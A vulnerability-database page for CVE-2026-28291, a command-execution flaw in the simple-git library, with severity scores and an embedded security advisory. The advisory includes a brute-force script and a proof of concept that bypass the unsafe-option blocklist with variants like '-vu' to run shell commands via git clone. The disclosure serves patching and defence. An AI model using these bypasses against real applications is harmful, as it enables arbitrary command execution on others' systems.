CVE-2026-28291

highpriority · track · 0EPSS 0.008 · 55 %ileEUUS
grimoire priorityP2 · Scheduled
Exploitable?
—
no known exploitation
Likely / severe?
0.77% (55th) EPSS
CVSS 8.1 · high
Is it mine?
3 products
Check your exposure
Who says so?
4 sources
cnnvd · enisa_euvd · nvd · osv

EPSS · scored 2026-10-27

simple-git enables running native Git commands from JavaScript. Versions up to and including 3.31.1 allow execution of arbitrary commands through Git option manipulation, bypassing safety checks meant to block dangerous options like -u and --upload-pack. The flaw stems from an incomplete fix for CVE-2022-25860, as Git's flexible option parsing allows numerous character combinations (e.g., -vu, -4u, -nu) to circumvent the regular-expression-based blocklist in the unsafe operations plugin. Due to the virtually infinite number of valid option variants that Git accepts, a complete blocklist-based mitigation may be infeasible without fully emulating Git's option parsing behavior. This issue has been fixed in version 3.32.0.

01

cvss

Technical severity, 0–10. One row per scoring source.

8.1
010

base score 0–10 · higher = more severe · hover a vector to decode

v3.18.1highCVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:Hsecondary · ENISA EU
v3.18.1highCVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:Hsecondary · security-advisories@github.comexploitability 2.2 · impact 5.9
v3.18.1highCVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:Hsecondaryexploitability 2.2 · impact 5.9
v3.18.1highCVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:Hsecondary · OSV
02

ssvc

A stakeholder decision — act, attend, or track — from exploitation and impact.

Exploitation: poc · Automatable: no · Technical Impact: totalcoordinatorcisa_ssvcUS
03

weaknesses

The CWE weakness classes this flaw belongs to.

04

affected products (3)

Products and version ranges known to be affected.

05

advisories (1)

Vendor and ecosystem advisories describing this.

  • GHSA-jcxm-m3jx-f287simple-git Affected by Command Execution via Option-Parsing Bypass2026-04-13ghsa · osvUS

    ### Summary simple-git enables running native Git commands from JavaScript. Some commands accept options that allow executing another command; because this is very dangerous, execution is denied unless the user explicitly allows it. This vulnerability allows a malicious actor who can control the options to execute other commands even in a “safe” state where the user has not explicitly allowed them. The vulnerability was introduced by an incorrect patch for CVE-2022-25860. It is *likely* to affect all versions prior to and including 3.28.0. ### Detail This vulnerability was introduced by an incorrect patch for CVE-2022-25860. It was reproduced in the following environment: ``` WSL Docker node: v22.19.0 git: git version 2.39.5 simple-git: 3.28.0 ```` The issue was not reproduced on Windows 11. The `-u` option, like `--upload-pack`, allows a command to be executed. Currently, the `-u` and `--upload-pack` options are blocked in the file `simple-git/src/lib/plugins/block-unsafe-operations-plugin.ts`. ```ts function preventUploadPack(arg: string, method: string) { if (/^\s*--(upload|receive)-pack/.test(arg)) { throw new GitPluginError( undefined, 'unsafe', `Use of --upload-pack or --receive-pack is not permitted without enabling allowUnsafePack` ); } if (method === 'clone' && /^\s*-u\b/.test(arg)) { throw new GitPluginError( undefined, 'unsafe', `Use of clone with option -u is not permitted without enabling allowUnsafePack` ); } if (method === 'push' && /^\s*--exec\b/.test(arg)) { throw new GitPluginError( undefined, 'unsafe', `Use of push with option --exec is not permitted without enabling allowUnsafePack` ); } } ```` However, the problem is that command option parsing is quite flexible. By brute forcing, I found various options that bypass the `-u` check. ``` [ '--u', '--u', '-4u', '-6u', '-lu', '-nu', '-qu', '-su', '-vu' ] ``` All of the above are three-character options that allow command execution. They enable execution even when `allowUnsafePack` is explicitly set to false. The depressing fact is that the options I found are probably only a tiny fraction of all possible option formats that enable command execution. In addition to the `-u` option, there is also the `--upload-pack` option and others, and some of the options I found can probably be extended to arbitrary length. Considering this, the number of option variants that enable command execution is probably infinite. Therefore, I could not find an effective way to block all such cases. Personally, I think it is virtually impossible to block this vulnerability completely. To fully block it, one would have to faithfully emulate Git’s option parsing rules, and it’s doubtful whether that is feasible. Just in case, I’ll share the brute-force code I used to find options that enable command execution. ```js const fs = require('fs'); const simpleGit = require('simple-git'); const TMP_DIR = './pwned/'; const ITER = 256; function cleanTmpDir() { if (fs.existsSync(TMP_DIR)) { fs.rmSync(TMP_DIR, { recursive: true, force: true }); } fs.mkdirSync(TMP_DIR, { recursive: true }); } function getPwnedFiles() { const found = []; for (let i = 0; i < ITER; i++) { const fname1 = `${TMP_DIR}1_${i}`; const fname2 = `${TMP_DIR}2_${i}`; const fname3 = `${TMP_DIR}3_${i}`; if (fs.existsSync(fname1)) found.push(String.fromCharCode(i) + '-u'); if (fs.existsSync(fname2)) found.push('-' + String.fromCharCode(i) + 'u'); if (fs.existsSync(fname3)) found.push('-u' + String.fromCharCode(i)); } return found; } async function runTest(runIdx) { const git = simpleGit(); // 1. `${~}-u` Pattern for (let i = 0; i < ITER; i++) { try { await git.clone('./testrepo1', './testrepo2', [String.fromCharCode(i) + '-u', `sh -c \"touch ${TMP_DIR}1_${i}\"`]); } catch {} } // 2. `-${~}u` Pattern for (let i = 0; i < ITER; i++) { try { await git.clone('./testrepo1', './testrepo2', ['-' + String.fromCharCode(i) + 'u', `sh -c \"touch ${TMP_DIR}2_${i}\"`]); } catch {} } // 3. `-u${~}` Pattern for (let i = 0; i < ITER; i++) { try { await git.clone('./testrepo1', './testrepo2', ['-u' + String.fromCharCode(i), `sh -c \"touch ${TMP_DIR}3_${i}\"`]); } catch {} } } async function main() { cleanTmpDir(); await runTest(); const found = getPwnedFiles(); console.log(found); } main(); ``` ### PoC The environment in which I succeeded is as follows. As long as the OS remains Linux, I suspect it will succeed reliably despite considerable variation in other factors. ``` WSL Docker node: v22.19.0 git: git version 2.39.5 simple-git: 3.28.0 ``` 1. Create any git repository inside the `testrepo1` folder. A very simple repository with a single commit and a single file is fine. 2. Run the following: ```js const { simpleGit } = require('simple-git'); async function main() { const git = await simpleGit({ unsafe: { allowUnsafePack: false } }); await git.clone('./testrepo1', './testrepo2', [`-vu sh -c \"touch /tmp/pwned\"`]); } main(); ``` This PoC explicitly configures `allowUnsafePack` to `false`. Of course, the same vulnerability occurs even without this option. An error is the expected behavior. 3. Check `/tmp` to confirm that `pwned` has been created. If it failed, try replacing `-vu` with a different option from the list. ### Impact This vulnerability is *likely* to affect all versions prior to and including 3.28.0. This is because it appears to be a continuation of the series of four vulnerabilities previously found in simple-git (CVE-2022-24433, CVE-2022-24066, CVE-2022-25912, CVE-2022-25860).

06

also known as (3)

Other names and identifiers for this entity.

07

sources

Which sources assert this record, and when.

published 2026-04-13modified 2026-10-26
08

references (18)

External citations — patches, advisories, analysis.

scry

Attackers weaponise vulnerabilities like this against internet-exposed services. See what is exposed on your perimeter with a free passive scan.

Free scan